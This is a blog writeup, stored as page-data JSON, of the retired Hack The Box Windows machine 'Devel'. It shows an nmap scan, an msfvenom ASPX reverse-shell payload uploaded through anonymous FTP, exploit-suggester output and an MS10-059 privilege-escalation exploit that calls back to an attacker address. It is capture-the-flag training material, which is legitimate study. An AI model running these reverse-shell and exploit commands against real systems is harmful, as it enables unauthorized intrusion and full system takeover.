{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-devel-en","result":{"data":{"markdownRemark":{"id":"51d880cb-6c3f-5de2-b518-1c7f10883f4e","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-devel\">original page</a>.</p>\n</blockquote>\n<p>I learn about security through the penetration-testing learning platform called “Hack The Box.”\nAt the time of writing, my rank on “Hack The Box” is Pro Hacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/c65a90f896171af0c6b6f7c98c6e4ed0/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXklEQVQY0zWPTU8aURSG5190343dtFGmWIa5d5zLzABD+AiCg0AACahNU1qTURNR8XPnShdNV8alSbdd+BP8VffxauLizZuc5DznOdb5POXo4Jc+m/8m2exQWe9QbXVoJH1avSG9rSmVZoIIyqhyjW9rISqu4wYxMqogwpisLGC7vjbB+vdwqv8/3vD8dM/FImXyY4/06Jjd2R6z9JCTi2uG011UbZ32YGwOJrS6A6Y722wOxwwmO+T86BXIVxFoa3FZ5/Zurv/+ueJ6sU892aI//o4qNfCiGqPtGcq0Xe+RCZus+FVkWCAdCYS/RhR6LDsKOy/1cs7GanQ+6snPmJPjEZNxm6DtUu0qim1J3HWo9j3CpsQtehQ3HGTFM8sFVqUyRsq8a8zcgJW8TZh80NbnzJIZfNKev0pWSPKReIsTSkTJgErCwCS5gocsm1avQGPkvsd/A2ccqb9kbV4AlhvA3rwpkOIAAAAASUVORK5CYII='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/c65a90f896171af0c6b6f7c98c6e4ed0/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/c65a90f896171af0c6b6f7c98c6e4ed0/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/c65a90f896171af0c6b6f7c98c6e4ed0/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time, this is a writeup for HackTheBox’s retired machine “Devel.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About this article</h2>\n<p><strong>The content of this article is not intended to recommend acts that are contrary to public order.</strong></p>\n<p>Please note in advance that attempting attacks against environments other than ones you own or are explicitly authorized to test may violate laws such as the Unauthorized Access Prohibition Act.</p>\n<p>Also, all statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#local-enumeration\">Local enumeration</a></li>\n<li><a href=\"#privilege-escalation\">Privilege escalation</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<p>It turned out that anonymous FTP login was possible.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.5  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token number\">21</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ftp</span>     Microsoft ftpd\n<span class=\"token operator\">|</span> ftp-syst: \n<span class=\"token operator\">|</span>_  SYST: Windows_NT\n<span class=\"token operator\">|</span> ftp-anon: Anonymous FTP login allowed <span class=\"token punctuation\">(</span>FTP code <span class=\"token number\">230</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> 03-18-17  02:06AM       <span class=\"token operator\">&lt;</span>DIR<span class=\"token operator\">></span>          aspnet_client\n<span class=\"token operator\">|</span> 03-17-17  05:37PM                  <span class=\"token number\">689</span> iisstart.htm\n<span class=\"token operator\">|</span>_03-17-17  05:37PM               <span class=\"token number\">184946</span> welcome.png\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Microsoft IIS httpd <span class=\"token number\">7.5</span>\n<span class=\"token operator\">|</span>_http-title: IIS7\n<span class=\"token operator\">|</span> http-methods: \n<span class=\"token operator\">|</span>_  Potentially risky methods: TRACE\n<span class=\"token operator\">|</span>_http-server-header: Microsoft-IIS/7.5\nService Info: OS: Windows<span class=\"token punctuation\">;</span> CPE: cpe:/o:microsoft:windows</code></pre></div>\n<p>Also, IIS was running on port 80.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/5b703a27eff891e603d40f4a628f7ad5/54bf4/image-20220723114718813.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 53.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACg0lEQVQoz3WSaUtUYRTH5xsUOK7j1kZ+jKAyZAg0lxQdcS+XGs0loUX0RQVqUVKNC6OO2zQ6M45z79yZueNu5lIiExVmBkogQYbRB/h175AUhS9+nIdzeP7P/5zzaKKiE0lIOE2M7gTxx5KIS0xCF3+KqNjjxCacJCI6nvDIOLSRsWgjYgkL1xEWoQud1Xx4lFJTOKqN4YhWh6asrAKVikojNfWNGG80UGWsxVjbgD7LwJnUbM5m5JGcXUBKbhEX80vRG0q4kFPIuaz8UD05PZeS8uuUXq1CEwgEUJFlGb/PF2JqMoDD6SSlroX01i6Ku6xUD7pocQXoCCxyX5zmWp+dAtMwmQ97SLndRr/Nztz0FBq3280fhFAURZEXtlGKn/Ri7LfTYhPon11m/tMOwd095Heb9MyucMsqUGIaIq21k46+AXySB40gCPyLx+Nh1O7gzvA4JnmB1e1d5MUlBL+MyyMx/3qNx4qAyTvDPZdM7ZALs+LQ5xHRqG7+5kBwTBHsnFzEsRpkZ/8nojKKXouFoZERPmxuYZsQkNbfY55Z5pFvgaFxN5IoHCYoYnc4MS+8wbYcZOPbD9zyJCOjY1jH7AzabPgUx2u737Eq9a6FdayChCQIhzsctdtp97+k91UQIbgRavvj1z229/bZUlj6/AX3203Mi+u0Ta1gcU7gFQ9pWZIkZSk2LtU3UdTeRdXTfmqeD9Dq9GGZW6HNIVHfPaLkLVQ+G0Bf10xHjxlZGcuhDh0OB2mGQvR5JWSUVXO5sgFD3V1Kmx5Q0NhMdtVNMq/UkFpYzvmMHEzdPfj9/v8FD0TVqL7o90qh76BuUMWrDN77+6zm1brs9yEpJtR7vwBq92PcVQz3eAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/5b703a27eff891e603d40f4a628f7ad5/8ac56/image-20220723114718813.webp 240w,\n/static/5b703a27eff891e603d40f4a628f7ad5/d3be9/image-20220723114718813.webp 480w,\n/static/5b703a27eff891e603d40f4a628f7ad5/e46b2/image-20220723114718813.webp 960w,\n/static/5b703a27eff891e603d40f4a628f7ad5/aa5f8/image-20220723114718813.webp 1007w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/5b703a27eff891e603d40f4a628f7ad5/8ff5a/image-20220723114718813.png 240w,\n/static/5b703a27eff891e603d40f4a628f7ad5/e85cb/image-20220723114718813.png 480w,\n/static/5b703a27eff891e603d40f4a628f7ad5/d9199/image-20220723114718813.png 960w,\n/static/5b703a27eff891e603d40f4a628f7ad5/54bf4/image-20220723114718813.png 1007w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/5b703a27eff891e603d40f4a628f7ad5/d9199/image-20220723114718813.png\"\n            alt=\"image-20220723114718813\"\n            title=\"image-20220723114718813\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since anonymous FTP login was available, I embedded an ASP payload created with msfvenom into the web server and obtained a reverse shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token variable\"><span class=\"token variable\">`</span><span class=\"token function\">ip</span> addr <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> -E -o <span class=\"token string\">\"10.10.([0-9]{1,3}[\\.]){1}[0-9]{1,3}\"</span><span class=\"token variable\">`</span></span>\n$ msfvenom -f aspx -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token variable\">$LHOST</span> <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> -o rev.aspx\n\n$ <span class=\"token builtin class-name\">echo</span> <span class=\"token function\">open</span> <span class=\"token number\">10.10</span>.10.5 <span class=\"token operator\">></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> user anonymous <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> binary <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> put rev.aspx <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> quit <span class=\"token operator\">>></span> ftp.txt\n$ <span class=\"token function\">ftp</span> -n <span class=\"token operator\">&lt;</span> ftp.txt</code></pre></div>\n<p>That gave me a shell.</p>\n<h2 id=\"local-enumeration\" style=\"position:relative;\"><a href=\"#local-enumeration\" aria-label=\"local enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Local enumeration</h2>\n<p>I got a shell, but unfortunately the privileges were the weak <code class=\"language-text\">iis apppool\\web</code>.</p>\n<p>So I started looking for a path to privilege escalation.</p>\n<p>Checking the system information first, I confirmed that it was a Windows 7 machine.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 903px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9c77f2117d6826de4bb3f6f07ab87036/c4b7c/image-20220723203944396.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 99.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACQUlEQVQ4y42U23qqQAyFeRy9UFRUDnIGOdr2/Z8mzR+LG6lt90W+gZnJykpWMk4YBnK9VpIkF4mi8GGn00lc15Xdbvew6X+/3z/WpTnn80ni+GIXttutmmsHaZrI8XgU7+iJ53lyOByEu0f9/wnMAKuqkLa9ShgE6niwy7DrukZ6rG/tmywIwtmvgHmeyTB08v4+GlNYwux2Gwyoaa4GmmWppey6f6RM5K67mnOep0JNYVEUuX1jQeBrumdL+zd2BliWuaUDUwAvKgiOVVVaKQo9b5pauPdfgGkaW0o4FUVmAmDD2An1TZLYVKfGc8V/MgcH0qVG1I9NlBzH3oLUdWm1JQPfPxsLmE7rRABBMSeOI2MGMAcAsrYahNqyVgpa19VDaYLwfblEZpaB1joKQ3E47IdWWmXD5f1+Z5H7XpV/G9SxNufoq7YTKzphUvsp5SxLzAGW97ZwzQFGBKEU3CEYLKZeneybKIwcLKHua3vQMhywd2+lzEABRCSYchfwl4CZtgoq931jAIgBIwBHVRqhJubL2f6X8gyQVAF603qhKsAw6L5EsXnWErzquZcMSYOmBSQI7lMCAOC0yUkfhL8aen5mDEmPtsGR1wZW7AHOyDF6c0WXJZiDOpvNxoAmZhzwTzOb0qSuI1iWhQVhPGEeas/5vi/egr2zWq2eij0dbDZbUxXBBu1TMgBg3ofYshzOer1+2pi+CWIMld3Hx03XxmqNMTk8Iku1vwHOgXn3YIVVmi69yHoHLYw9L/hSrE/mepQYEqBd4gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9c77f2117d6826de4bb3f6f07ab87036/8ac56/image-20220723203944396.webp 240w,\n/static/9c77f2117d6826de4bb3f6f07ab87036/d3be9/image-20220723203944396.webp 480w,\n/static/9c77f2117d6826de4bb3f6f07ab87036/4673f/image-20220723203944396.webp 903w\"\n              sizes=\"(max-width: 903px) 100vw, 903px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9c77f2117d6826de4bb3f6f07ab87036/8ff5a/image-20220723203944396.png 240w,\n/static/9c77f2117d6826de4bb3f6f07ab87036/e85cb/image-20220723203944396.png 480w,\n/static/9c77f2117d6826de4bb3f6f07ab87036/c4b7c/image-20220723203944396.png 903w\"\n            sizes=\"(max-width: 903px) 100vw, 903px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9c77f2117d6826de4bb3f6f07ab87036/c4b7c/image-20220723203944396.png\"\n            alt=\"image-20220723203944396\"\n            title=\"image-20220723203944396\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I explored scheduled tasks and files on the host, but I did not find anything useful, so I decided to look for local vulnerabilities.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ python windows-exploit-suggester.py --database <span class=\"token number\">2022</span>-07-23-mssb.xls --systeminfo systeminfo.txt\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> initiating winsploit version <span class=\"token number\">3.3</span><span class=\"token punctuation\">..</span>.\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> database <span class=\"token function\">file</span> detected as xls or xlsx based on extension\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> attempting to <span class=\"token builtin class-name\">read</span> from the systeminfo input <span class=\"token function\">file</span>\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> systeminfo input <span class=\"token function\">file</span> <span class=\"token builtin class-name\">read</span> successfully <span class=\"token punctuation\">(</span>utf-8<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> querying database <span class=\"token function\">file</span> <span class=\"token keyword\">for</span> potential vulnerabilities\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> comparing the <span class=\"token number\">0</span> hotfix<span class=\"token punctuation\">(</span>es<span class=\"token punctuation\">)</span> against the <span class=\"token number\">179</span> potential bulletins<span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span> with a database of <span class=\"token number\">137</span> known exploits\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> there are now <span class=\"token number\">179</span> remaining vulns\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> exploitdb PoC, <span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> Metasploit module, <span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> missing bulletin\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> windows version identified as <span class=\"token string\">'Windows 7 32-bit'</span>\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> \n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS13-009: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">2792100</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS13-005: Vulnerability <span class=\"token keyword\">in</span> Windows Kernel-Mode Driver Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">2778930</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS12-037: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">2699988</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span>   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer <span class=\"token number\">8</span> - Fixed Col Span ID Full ASLR, DEP <span class=\"token operator\">&amp;</span> EMET <span class=\"token number\">5</span>., PoC\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span>   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer <span class=\"token number\">8</span> - Fixed Col Span ID Full ASLR, DEP <span class=\"token operator\">&amp;</span> EMET <span class=\"token number\">5.0</span> Bypass <span class=\"token punctuation\">(</span>MS12-037<span class=\"token punctuation\">)</span>, PoC\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> \n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS11-011: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">2393802</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-073: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel-Mode Drivers Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">981957</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-061: Vulnerability <span class=\"token keyword\">in</span> Print Spooler Service Could Allow Remote Code Execution <span class=\"token punctuation\">(</span><span class=\"token number\">2347290</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS10-059: Vulnerabilities <span class=\"token keyword\">in</span> the Tracing Feature <span class=\"token keyword\">for</span> Services Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">982799</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>E<span class=\"token punctuation\">]</span> MS10-047: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">981852</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-015: Vulnerabilities <span class=\"token keyword\">in</span> Windows Kernel Could Allow Elevation of Privilege <span class=\"token punctuation\">(</span><span class=\"token number\">977165</span><span class=\"token punctuation\">)</span> - Important\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS10-002: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">978207</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>M<span class=\"token punctuation\">]</span> MS09-072: Cumulative Security Update <span class=\"token keyword\">for</span> Internet Explorer <span class=\"token punctuation\">(</span><span class=\"token number\">976325</span><span class=\"token punctuation\">)</span> - Critical\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> <span class=\"token keyword\">done</span></code></pre></div>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege escalation</h2>\n<p>In the previous section, I was able to identify candidate vulnerabilities.</p>\n<p>Since I could write files via FTP under <code class=\"language-text\">wwwroot</code>, I tried a few exploits that looked promising.</p>\n<p>In the end, the PoC for <a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS10-059</a> worked.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># File transfer</span>\n<span class=\"token builtin class-name\">echo</span> <span class=\"token function\">open</span> <span class=\"token number\">10.10</span>.10.5 <span class=\"token operator\">></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> user anonymous <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> binary <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> put MS10-059.exe <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> quit <span class=\"token operator\">>></span> ftp.txt\n<span class=\"token function\">ftp</span> -n <span class=\"token operator\">&lt;</span> ftp.txt\n\n<span class=\"token comment\"># Exploit</span>\nMS10-059.exe <span class=\"token number\">10.10</span>.14.2 <span class=\"token number\">9999</span></code></pre></div>\n<p>This gave me SYSTEM privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">c:<span class=\"token punctuation\">\\</span>inetpub<span class=\"token punctuation\">\\</span>wwwroot<span class=\"token operator\">></span>whoami\n<span class=\"token function\">whoami</span>\nnt authority<span class=\"token punctuation\">\\</span>system</code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>It feels good when an easy box falls quickly like this.</p>","fields":{"slug":"/hackthebox-windows-devel-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-23","description":"This is a writeup for HackTheBox’s retired machine “Devel.”","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"【Easy/Windows】Devel Writeup (HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-devel-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}